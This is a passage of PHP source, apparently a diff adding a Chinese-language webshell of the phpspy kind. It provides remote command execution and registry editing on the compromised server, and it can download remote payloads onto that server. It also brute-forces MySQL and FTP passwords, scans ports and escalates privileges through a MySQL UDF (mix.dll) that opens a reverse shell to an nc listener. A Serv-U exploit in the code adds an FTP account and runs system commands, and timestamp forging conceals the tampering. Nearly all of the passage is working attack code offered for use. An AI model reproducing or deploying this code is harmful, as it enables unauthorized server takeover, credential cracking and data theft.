','left'); + $tb->tdbody('当前文件名: '.$file); + $tb->makehidden('curfile',$file); + $tb->tdbody('修改为: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 时 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30'); + $tb->makehidden('do','modmytime'); + $tb->formfooter('1','30'); +}//end newtime + +elseif ($_GET['action'] == "shell") { + $action = "??action=shell&dir=".urlencode($dir); + $tb->tableheader(); + $tb->tdheader('WebShell Mode'); + if (substr(PHP_OS, 0, 3) == 'WIN') { + $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe"; + $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt"; + echo "
\n"; + $tb->tdbody('无回显运行程序 → 文件: '.$tb->makeinput('program',$program).' 参数: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35'); + $tb->makehidden('do','programrun'); + echo "
\n"; + } + echo "
\n"; + if(isset($_POST['cmd'])) $cmd = $_POST['cmd']; + $tb->tdbody('提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容. '); + $tb->tdbody('proc_open函数假设不是默认的winnt系统请自行设置使用,自行修改记得写退出,否则会在主机上留下一个未结束的进程.'); + $tb->tdbody('proc_open函数要使用的cmd程序的位置:'.$tb->makeinput('cmd',$cmd,'','text','30').'(要是是linux系统还是大大们自己修改吧)'); + $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open'); + $tb->tdbody('选择执行函数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 输入命令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit')); +?> + + + +
+ +tableheader(); + $tb->formheader($action,'读取注册表'); + $tb->tdbody('键值: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','读取','','submit'),'center','2','50'); + echo ""; + + $tb->formheader($action,'写入注册表'); + $cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ'); + $tb->tdbody('键值: '.$tb->makeinput('writeregname',$registre,'','text','56').' 类型: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' 值: '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','写入','','submit'),'center','2','50'); + echo ""; + + $tb->formheader($action,'删除注册表'); + $tb->tdbody('键值: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','删除','','submit'),'center','2','50'); + echo ""; + $tb->tablefooter(); +}//end reg +elseif ($_GET['action'] == "downloads"){ +$action = '?action=dir'; + $tb->tableheader(); + $tb->formheader($action,'http文件下载模式'); + $tb->tdbody('你可以使用本功能把一些小工具以http方式下载到此服务器','center'); + $tb->tdbody('文件位置: '.$tb->makeinput('durl','http://1v1.name/myshell.txt','','text','70').'
下载到:'.$tb->makeinput('path','./myshell.php','','text','60').''.$tb->makehidden('do','downloads').''.$tb->makeinput('','下载','','submit'),'center','1','35'); + echo ""; + $tb->tdbody('注意,假设文件太大将无法下载下来而且影响执行速度.','center'); + $tb->tablefooter(); +} +elseif ($_GET['action'] == "mix"){ +$action = '?action=dir'; + $tb->tableheader(); + $tb->formheader($action,'解压缩mix.dll文件'); + $tb->tdbody('在这里可以把压缩在phpspy里的mix.dll解压缩出来。','center'); + $tb->tdbody('解压缩为: '.$tb->makeinput('mixto','./mix.dll','','text','70').''.$tb->makehidden('action','mix').''.$tb->makeinput('','unzip','','submit'),'center','1','35'); + echo ""; + $tb->tdbody('可以使用相对或绝对路径.','center'); + $tb->tablefooter(); +} +elseif ($_GET['action'] == "crack"){ +$action = '?action=dir'; + $tb->tableheader(); + $tb->tdbody('这里的组件主要用来突破一些特别的地方而准备,比如内网。','center'); + if($type=="crack"){ + if(!empty($_POST['thename'])) { + $thehost = gethostbyname($_POST['thename']); + if(!$thehost) $thehost = '主机名不存在'; + } + $tb->formheader($action,'暴力破解mysql或ftp密码'); + $tb->tdbody('你在这里设置一些参数进行mysql登陆密码的破解。','center'); + $tb->tdbody('host: '.$tb->makeinput('host','localhost','','text','12').' 帐号:'.$tb->makeinput('user','root','','text','12').''.$tb->makehidden('do','crack').' 字典:'.$tb->makeinput('passfile','./password.txt','','text','20').' 一次试探:'.$tb->makeinput('onetime','100','','text','6').'个 '.$tb->makeinput('','crack','','submit'),'center','1','35'); + $tb->tdbody('MYSQL:   Ftp:','center'); + echo ""; + if(getphpcfg("allow_url_fopen")=="Yes") $temp = "或远程文件"; + $tb->tdbody('字典可以使用相对或绝对路径'.$temp.',Ftp的密码破解测试已经通过。','center'); + $tb->formheader($action,'端口扫描'); + $tb->tdbody('在这里可以进行端口的简单扫描。','center'); + $tb->tdbody('host: '.$tb->makeinput('host','127.0.0.1',''.$tb->makehidden('do','port').'','text','12').' 端口表:'.$tb->makeinput('port',''.$admin[port].'','','text','60').'','center','1','35'); + $tb->tdbody(''.$tb->makeinput('','进行端口扫描','','submit').'','center'); + echo ""; + $tb->tdbody('端口表请把你要查的端口用逗号隔开!','center'); + $tb->formheader('?action=crack&type=crack','主机名 to IP转换 (内&外网有效)'); + $tb->tdbody('假设你获取到内网一个计算机名,想找到它的IP时候。','center'); + $tb->tdbody('主机名: '.$tb->makeinput('thename',$thename,'','text','20').' IP:'.$tb->makeinput('thehost',$thehost,'','text','20').''.$tb->makeinput('','互相转换','','submit'),'center','1','35'); + echo ""; +}else{ + $tb->formheader("".$action."\" enctype=\"multipart/form-data",'使用Mysql上传文件'); + $tb->tdbody('利用Mysql连接帐号把文件以mysql的权限导到Webshell权限本身不可写的地方','center'); + $tb->tdbody('Host: '.$tb->makeinput('host','localhost','','text','16').'User: '.$tb->makeinput('user','root','','text','16').'PASS: '.$tb->makeinput('password','','','text','16').'db: '.$tb->makeinput('database','mysql.user','','text','16').'upto: '.$tb->makeinput('uppath','c:/','','text','16').''.$tb->makehidden('action','mysqlup'),'center','1','35'); + $tb->tdbody('上传后文件名: '.$tb->makeinput('upname','','','text','16').'选择文件: '.$tb->makeinput('upfile','','','file','26').''.$tb->makeinput('','upload','','submit'),'center','1','35'); + echo ""; + $tb->tdbody('貌似只要有file权限的帐号就可以了,不写上传后文件名则为原来文件名。.','center'); + $tb->formheader($action,'利用Mysql下载文件'); + $tb->tdbody('利用Mysql连接帐号下载Webshell不能读取下载的文件或数据库服务器文件。 启用压缩: ','center'); + $tb->tdbody('Host: '.$tb->makeinput('host','localhost','','text','16').'User: '.$tb->makeinput('user','root','','text','16').'PASS: '.$tb->makeinput('password','','','text','16').''.$tb->makehidden('action','mysqldown').'文件: '.$tb->makeinput('filename','C:/windows/php.ini','','text','26').''.$tb->makeinput('','download','','submit'),'center','1','35'); + echo ""; + $tb->tdbody('貌似只要有file权限的帐号就可以了,至少可以读到邻居了.','center'); + $tb->tdbody('Windows默认情况下Mysql为System权限,而Linux系统则权限不高。.','center'); +} + $tb->tablefooter(); +} +elseif($_GET['action']=="setting"){ + if($admin[check]=="1") $check[1] = "checked"; + else $check[2] ="checked"; + if($admin[alexa]=="1") $check[3] = "checked"; + else $check[4] ="checked"; + $action = '?action=dir'; + $tb->tableheader(); + $tb->formheader($action ,'设置部分'); + $tb->tdbody('程序的基本设置部分。','center'); + //$tb->tdbody('网站排名显示: '.$tb->makeinput('alexa',$admin[alexa],'','text','20').'','center'); + $tb->tdbody('是否显示网站排名:  Yes:   No:','center'); + $tb->tdbody('密码: '.$tb->makeinput('pass',$admin[pass],'','text','12').'破解时跳秒: '.$tb->makeinput('jumpsecond',$admin[jumpsecond],'','text','2').'','center'); + $tb->tdbody('默认端口表: '.$tb->makeinput('port',$admin[port],'','text','33').'','center'); + $tb->makehidden('do','setting'); + $tb->tdbody('是否使用密码:    使用:   不使用:','center'); + $tb->tdbody($tb->makeinput('','保存修改','','submit'),'center'); + echo ""; + $tb->tdbody('假设修改了密码的话必须要重新登陆才可以进入webshell。','center'); + $tb->tableheader(); +} +elseif ($_GET['action'] == "search"){ +$action = '?dir='.$dir.''; + $tb->tableheader(); + $tb->formheader($action,'文件查找'); + $tb->tdbody('你可以使用本功能查找一个目录下的文件里哪写文件包含着关键词!','center'); + $tb->tdbody('文件位置: '.$tb->makeinput('path',''.$nowpath.'','','text','70').'
查找文字:'.$tb->makeinput('oldkey','下贱','','text','60').''.$tb->makehidden('do','search').'
是否计算所在行 (此功能和下面一个功能会影响执行速度,所以默认关闭!)
适当读取: 读取关键词前'.$tb->makeinput('beline','0','','text','3').'个字符 '.$tb->makehidden('dir',''.$dir.'').'到关键词后第'.$tb->makeinput('endline','10','','text','3').'个字符... '.$tb->makehidden('dir',''.$dir.'').''.$tb->makeinput('','开始查找文件','','submit'),'center','1','35'); + echo ""; + $tb->tdbody('请表太大的目录了,慢慢浏览慢慢找好不好嘛.假设选定计算行速度会慢。显示[所在行/总共多少行]','center'); + $tb->tablefooter(); +} +elseif ($_GET['action'] == "proxy") { + $url="http://1v1.name"; + $action = '?action=proxy'; + $tb->tableheader(); + $tb->formheader($action,'在线代理','proxyframe'); + $tb->tdbody('
  • 用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.
  • 用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.
  • 用本功能浏览的 URL,在目标主机上留下的IP记录是 : '.gethostbyname($_SERVER['SERVER_NAME']).'
','left'); + $tb->tdbody('URL: '.$tb->makeinput('url','http://1v1.name','','text','100').' '.$tb->makeinput('','浏览','','submit'),'center','1','40'); + $tb->tdbody(''); + if (strlen($url) != 15) { + setcookie ("adminpass", ""); + echo ""; + } + echo ""; + $tb->tablefooter(); +}//end proxy + +elseif ($_GET['action'] == "sql") { + $action = '?action=sql'; + + $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost'; + $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root'; + $dbpassword = $_POST['dbpassword']; + $dbname = $_POST['dbname']; + $sql_query = $_POST['sql_query']; +if($type=="fun"){ +$sql_query = "CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\\Winnt\\\Mix.dll'; +select Mixconnect('".$_SERVER['REMOTE_ADDR']."','8888');/*这个最好先执行了上面一句再用*/ +/*请在你计算机上执行 nc -vv -l -p 8888*/"; +} + $tb->tableheader(); + $tb->formheader($action,'执行 SQL 语句'); + $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit')); + $tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10')); + $tb->makehidden('do','query'); + $tb->formfooter('1','30'); +}//end sql query +elseif ($_GET['action'] == "adodb") { + $action = '?action=adodb'; + if($type=='mysql'){ + $sqltype = 'Driver={MySql};Server=127.0.0.1;Port=3306;Database=DbName;Uid=root;Pwd=****'; + $echotype = "[Mysql]"; + } + elseif($type=='mssql') { + $sqltype = 'Driver={Sql Server};Server=127.0.0.1,1433;Database=DbName;Uid=sa;Pwd=****'; + $echotype = "[Mssql]"; + } + elseif($type=='access'){ + $sqltype = 'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\本地站点\DbName.mdb;Jet OLEDB:Database Password=***'; + $echotype = "[Access]"; + }elseif($type=='oracle'){ + $sqltype = 'Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;'; + $echotype = "[Oracle]"; + }elseif($type=='db2'){ + $sqltype = 'Provider=DB2OLEDB;Network Transport Library=TCPIP;Network Address=127.0.0.1;Initial Catalog=MyCtlg;Package Collection=MyPkgCol;Default Schema=Schema;User ID=帐号;Password=密码'; + $echotype = "[DB2]"; + } + if($_POST['sqltype']) $sqltype = $_POST['sqltype'];; + if(!isset($sqltype)) $sqltype = '请选择数据库类型或自己输入adodb连接语句。'; + $dbpassword = $_POST['dbpassword']; + $dbname = $_POST['dbname']; + $sql_query = $_POST['sql_query']; +echo << +function mycopy() +{ +content=document.all.sqltype.value; +clipboardData.setData('text',content); +alert('类型已经复制,可以粘贴在其他地方.') +} + +EOM; + $tb->tableheader(); + $tb->formheader($action,'使用 ADODB 执行 SQL 语句'); + $tb->tdbody('(Mysql) (Mssql) (Access) (Oracle) (DB2)'); + $tb->tdbody(' 这里利用Windows默认开启的COM组件执行数据库,在某些情况下或许用得上,需要被添加数据源。'); + $tb->tdbody(''.$echotype.' SQL Type: '.$tb->makeinput('sqltype',$sqltype,'','text','65').' Copy'); + $tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10')); + $tb->makehidden('do','adodbquery'); + $tb->makehidden('type',$type); + $tb->formfooter('1','30'); +}//end sql query + +elseif ($_GET['action'] == "sqlbak") { + $action = '?action=sqlbak'; + $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost'; + $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root'; + $dbpassword = $_POST['dbpassword']; + $dbname = $_POST['dbname']; + $tb->tableheader(); + $tb->formheader($action,'备份 MySQL 数据库'); + $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit')); + @mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname); + $tables = @mysql_list_tables($dbname); + while ($table = @mysql_fetch_row($tables)) { + $cachetables[$table[0]] = $table[0]; + } + @mysql_free_result($tables); + if (empty($cachetables)) { + $tb->tdbody('您没有连接数据库 or 当前数据库没有任何数据表'); + } else { + $tb->tdbody('
请选择表:'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'
备份数据所保存的路径:'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].$cckk.'_MySQL.sql','','text','50').'
直接下载到本地 (适合数据量较小的数据库)
'); + $tb->makehidden('do','backupmysql'); + $tb->formfooter('0','30'); + } + $tb->tablefooter(); + @mysql_close(); +}//end sql backup +elseif ($_GET['action'] == "phpenv") { + $user = " 获取当前进程用户名 "; + $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传"; + $adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; + if ($dis_func == "") { + $dis_func = "No"; + }else { + $dis_func = str_replace(" ","
",$dis_func); + $dis_func = str_replace(",","
",$dis_func); + } + $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; + $info = array( + 0 => array("当前php进程用户",$user), + 1 => array("服务器操作系统",PHP_OS), + 2 => array("服务器时间",date("Y年m月d日 h:i:s",time())), + 3 => array("服务器域名","".$_SERVER['SERVER_NAME'].""), + 4 => array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])), + 5 => array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']), + 6 => array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']), + 7 => array("Web服务端口",$_SERVER['SERVER_PORT']), + 8 => array("PHP运行方式",strtoupper(php_sapi_name())), + 9 => array("PHP版本",PHP_VERSION), + 10 => array("运行于安全模式",getphpcfg("safemode")), + 11 => array("服务器管理员",$adminmail), + 12 => array("本文件路径",__FILE__), + 13 => array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen")), + 14 => array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl")), + 15 => array("显示错误信息 display_errors",getphpcfg("display_errors")), + 16 => array("自动定义全局变量 register_globals",getphpcfg("register_globals")), + 17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")), + 18 => array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit")), + 19 => array("POST最大字节数 post_max_size",getphpcfg("post_max_size")), + 20 => array("允许最大上传文件 upload_max_filesize",$upsize), + 21 => array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒"), + 22 => array("被禁用的函数 disable_functions",$dis_func), + 23 => array("phpinfo()",$phpinfo), + 24 => array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), + 25 => array("图形处理 GD Library",getfun("imageline")), + 26 => array("IMAP电子邮件系统",getfun("imap_close")), + 27 => array("MySQL数据库",getfun("mysql_close")), + 28 => array("SyBase数据库",getfun("sybase_close")), + 29 => array("Oracle数据库",getfun("ora_close")), + 30 => array("Oracle 8 数据库",getfun("OCILogOff")), + 31 => array("PREL相容语法 PCRE",getfun("preg_match")), + 32 => array("PDF文档支持",getfun("pdf_close")), + 33 => array("Postgre SQL数据库",getfun("pg_close")), + 34 => array("SNMP网络管理协议",getfun("snmpget")), + 35 => array("压缩文件支持(Zlib)",getfun("gzclose")), + 36 => array("XML解析",getfun("xml_set_object")), + 37 => array("FTP",getfun("ftp_login")), + 38 => array("ODBC数据库连接",getfun("odbc_close")), + 39 => array("Session支持",getfun("session_start")), + 40 => array("Socket支持",getfun("fsockopen")), + ); + $tb->tableheader(); + echo "
\n"; + $tb->tdbody('查看PHP配置参数状况','left','1','30','style="padding-left: 5px;"'); + $tb->tdbody('请输入配置参数(如:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','查看','','submit'),'left','2','30','style="padding-left: 5px;"'); + $tb->makehidden('do','viewphpvar'); + echo "
\n"; + $hp = array(0=> '服务器特性', 1=> 'PHP基本特性', 2=> '组件支持状况'); + for ($a=0;$a<3;$a++) { + $tb->tdbody(''.$hp[1].'','left','1','30','style="padding-left: 5px;"'); +?> + + + +\n"; + } + } elseif ($a == 1) { + for ($i=13;$i<=24;$i++) { + echo "\n"; + } + } elseif ($a == 2) { + for ($i=25;$i<=40;$i++) { + echo "\n"; + } + } +?> +
".$info[$i][0]."".$info[$i][1]."
".$info[$i][0]."".$info[$i][1]."
".$info[$i][0]."".$info[$i][1]."
+ + +"; +}//end phpenv + +elseif($_GET['action'] == "mysqlfun"){ + echo "
"; + if($_POST['port'] != "" && $_POST['ip'] != "" && $_POST['function'] != "" && $_POST['host'] != "" && $_POST['user'] != "") + { + $link=@mysql_connect($_POST['host'],$_POST['user'],$_POST['pass']); + if (!$link) { + echo "Could not connect: ".mysql_error()."
"; + } + else{ + echo "Connected successfully as ".$_POST['user']."
"; + if(isset($_POST['mixpath'])&&!@file_exists($_POST['mixpath'])){ + echo"Can't find the ".$_POST['mixpath']."
"; + } + if(isset($_POST['mixpath'])){ + $dll_path = addslashes($_POST['mixpath']); + $query="create function ".$_POST['function']." returns integer soname '".$dll_path."';"; + echo (@mysql_query($query, $link)) ? "Success: ".$query."
" : "Create function faild!
".mysql_error()."
"; + } + echo"Now Select Function name of ".$_POST['function']."
"; + $query="select ".$_POST['function']."('".$_POST['ip']."','".$_POST['port']."');"; + echo (@mysql_query($query, $link)) ? "Success: ".$query."
" : "Select Function name of ".$_POST['function']." faild!
".mysql_error()."
"; + mysql_close($link); + } + }else{ + echo"Help?? View http://www.ph4nt0m.org/bbs/showthread.php?threadid=33006"; + } + echo "
"; + if($nodll=="yes"){ + $echodll = " (?)  Mixdll : +  (已有function)"; + }else{ + $echodll = "此步利用已建function进行工作。  (未建function)"; + } +?> + + + + + + + + + + + + + + + +
mysql_function提权(mix.dll)
(Func) 返回端口: +   + 返回IP: +  function名: +  (Mix.dll) +
+ Host : User : PassWd :
+ + ";?>
  +
Remember,Love is a dieing dream....
+"; + $sendbuf = ""; + $recvbuf = ""; + $domain = "-SETDOMAIN\r\n". + "-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n". + "-TZOEnable=0\r\n". + " TZOKey=\r\n"; + $adduser = "-SETUSERSETUP\r\n". + "-IP=0.0.0.0\r\n". + "-PortNo=21\r\n". + "-User=".$user."\r\n". + "-Password=".$password."\r\n". + "-HomeDir=c:\\\r\n". + "-LoginMesFile=\r\n". + "-Disable=0\r\n". + "-RelPaths=1\r\n". + "-NeedSecure=0\r\n". + "-HideHidden=0\r\n". + "-AlwaysAllowLogin=0\r\n". + "-ChangePassword=0\r\n". + "-QuotaEnable=0\r\n". + "-MaxUsersLoginPerIP=-1\r\n". + "-SpeedLimitUp=0\r\n". + "-SpeedLimitDown=0\r\n". + "-MaxNrUsers=-1\r\n". + "-IdleTimeOut=600\r\n". + "-SessionTimeOut=-1\r\n". + "-Expire=0\r\n". + "-RatioUp=1\r\n". + "-RatioDown=1\r\n". + "-RatiosCredit=0\r\n". + "-QuotaCurrent=0\r\n". + "-QuotaMaximum=0\r\n". + "-Maintenance=None\r\n". + "-PasswordType=Regular\r\n". + "-Ratios=None\r\n". + " Access=".$part."\|RWAMELCDP\r\n"; + $deldomain="-DELETEDOMAIN\r\n". + "-IP=0.0.0.0\r\n". + " PortNo=21\r\n"; + $sock = fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10); + $recvbuf = fgets($sock, 1024); + echo "Recv: $recvbuf
"; + $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; + fputs($sock, $sendbuf, strlen($sendbuf)); + echo "Send: $sendbuf
"; + $recvbuf = fgets($sock, 1024); + echo "Recv: $recvbuf
"; + $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; + fputs($sock, $sendbuf, strlen($sendbuf)); + echo "Send: $sendbuf
"; + $recvbuf = fgets($sock, 1024); + echo "Recv: $recvbuf
"; + $sendbuf = "SITE MAINTENANCE\r\n"; + fputs($sock, $sendbuf, strlen($sendbuf)); + echo "Send: $sendbuf
"; + $recvbuf = fgets($sock, 1024); + echo "Recv: $recvbuf
"; + $sendbuf = $domain; + fputs($sock, $sendbuf, strlen($sendbuf)); + echo "Send: $sendbuf
"; + $recvbuf = fgets($sock, 1024); + echo "Recv: $recvbuf
"; + $sendbuf = $adduser; + fputs($sock, $sendbuf, strlen($sendbuf)); + echo "Send: $sendbuf
"; + $recvbuf = fgets($sock, 1024); + echo "Recv: $recvbuf
"; + echo "**********************************************************
"; + if($job!=="adduser"){//假设不是建立用户 + echo "Starting Exploit ...
"; + echo "**********************************************************
"; + $exp = fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10); + $recvbuf = fgets($exp, 1024); + echo "Recv: $recvbuf
"; + $sendbuf = "USER ".$user."\r\n"; + fputs($exp, $sendbuf, strlen($sendbuf)); + echo "Send: $sendbuf
"; + $recvbuf = fgets($exp, 1024); + echo "Recv: $recvbuf
"; + $sendbuf = "PASS ".$password."\r\n"; + fputs($exp, $sendbuf, strlen($sendbuf)); + echo "Send: $sendbuf
"; + $recvbuf = fgets($exp, 1024); + echo "Recv: $recvbuf
"; + $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; + fputs($exp, $sendbuf, strlen($sendbuf)); + echo "Send: site exec ".$_POST["SUCommand"]."
"; + $recvbuf = fgets($exp, 1024); + echo "Recv: $recvbuf
"; + echo "**********************************************************
"; + echo "Starting Delete Domain ...
"; + echo "**********************************************************
"; + $sendbuf = $deldomain; + fputs($sock, $sendbuf, strlen($sendbuf)); + echo "Send: $sendbuf
"; + $recvbuf = fgets($sock, 1024); + echo "Recv: $recvbuf
"; + }else{ + echo "All done ...
"; + echo "**********************************************************
"; + } + echo ""; + fclose($sock); + if($job!=="adduser") fclose($exp); + } +?> + + + + + + + + + + + + +
通过Serv-U 本地管理员帐号执行命令 & 添加域管理
LocalPort: +   + LocalUser: +  LocalPass: + +
+ + Command : +  (添加用户) - (?) + + + + + 帐号: + + 密码: + + 目录: + + (执行CMD) - (?) + +
  +
+ +
+ + + + + +
Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.
+
+ + + + + + + + + + + +read()) { + if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { + @chmod("$deldir/$file",0777); + deltree("$deldir/$file"); + } + if (is_file("$deldir/$file")) { + @chmod("$deldir/$file",0777); + @unlink("$deldir/$file"); + } + } + $mydir->close(); + @chmod("$deldir",0777); + return (@rmdir($deldir)) ? 1 : 0; + } + + // 判断读写情况 + function dir_writeable($dir) { + if (!is_dir($dir)) { + @mkdir($dir, 0777); + } + if(is_dir($dir)) { + if ($fp = @fopen("$dir/test.txt", 'w')) { + @fclose($fp); + @unlink("$dir/test.txt"); + $writeable = 1; + } else { + $writeable = 0; + } + } + return $writeable; + } + + // 表格行间的背景色替换 + function getrowbg() { + global $bgcounter; + if ($bgcounter++%2==0) { + return "firstalt"; + } else { + return "secondalt"; + } + } + + // 获取当前的文件系统路径 + function getPath($mainpath, $relativepath) { + global $dir; + $mainpath_info = explode('/', $mainpath); + $relativepath_info = explode('/', $relativepath); + $relativepath_info_count = count($relativepath_info); + for ($i=0; $i<$relativepath_info_count; $i++) { + if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; + if ($relativepath_info[$i] == '..') { + $mainpath_info_count = count($mainpath_info); + unset($mainpath_info[$mainpath_info_count-1]); + continue; + } + $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; + } //end for + return implode('/', $mainpath_info); + } + + // 检查PHP配置参数 + function getphpcfg($varname) { + switch($result = get_cfg_var($varname)) { + case 0: + return "No"; + break; + case 1: + return "Yes"; + break; + default: + return $result; + break; + } + } + + // 检查函数情况 + function getfun($funName) { + return (false !== function_exists($funName)) ? "Yes" : "No"; + } + + // 压缩打包类 + class zip //ZIP压缩类 +{ + + var $datasec, $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; var $dirs = Array("."); + + function Add($files,$compact) + { + if(!is_array($files[0])) $files=Array($files); + + for($i=0;$files[$i];$i++){ + $fn = $files[$i]; + if(!in_Array(dirname($fn[0]),$this->dirs)) + $this->add_Dir(dirname($fn[0])); + if(basename($fn[0])) + $ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); + } + return $ret; + } +function get_file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + + return $data . $ctrldir . $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). + pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; + } + function ReadCentralDir($zip,$zip_name) + { + $size = filesize($zip_name); + if ($size < 277) $maximum_size = $size; + else $maximum_size=277; + @fseek($zip, $size-$maximum_size); + $pos = ftell($zip); $bytes = 0x00000000; + while ($pos < $size) + { + $byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); + if ($bytes == 0x504b0506){ $pos++; break; } $pos++; + } + $data=unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip,18)); + if ($data['comment_size'] != 0) + $centd['comment'] = fread($zip, $data['comment_size']); + else $centd['comment'] = ''; $centd['entries'] = $data['entries']; + $centd['disk_entries'] = $data['disk_entries']; + $centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; + $centd['size'] = $data['size']; $centd['disk'] = $data['disk']; + return $centd; + } + function ReadCentralFileHeaders($zip){ + $binary_data = fread($zip, 46); + $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); + if ($header['filename_len'] != 0) + $header['filename'] = fread($zip,$header['filename_len']); + else $header['filename'] = ''; + if ($header['extra_len'] != 0) + $header['extra'] = fread($zip, $header['extra_len']); + else $header['extra'] = ''; + if ($header['comment_len'] != 0) + $header['comment'] = fread($zip, $header['comment_len']); + else $header['comment'] = ''; + if ($header['mdate'] && $header['mtime']) + { + $hour = ($header['mtime'] & 0xF800) >> 11; + $minute = ($header['mtime'] & 0x07E0) >> 5; + $seconde = ($header['mtime'] & 0x001F)*2; + $year = (($header['mdate'] & 0xFE00) >> 9) + 1980; + $month = ($header['mdate'] & 0x01E0) >> 5; + $day = $header['mdate'] & 0x001F; + $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); + } else { + $header['mtime'] = time(); + } + $header['stored_filename'] = $header['filename']; + $header['status'] = 'ok'; + if (substr($header['filename'], -1) == '/') + $header['external'] = 0x41FF0010; + return $header; + } + function add_dir($name) + { + $name = str_replace("\\", "/", $name); + $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; + + $fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); + $fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); + $this -> datasec[] = $fr; + + $new_offset = strlen(implode("", $this->datasec)); + + $cdrec = 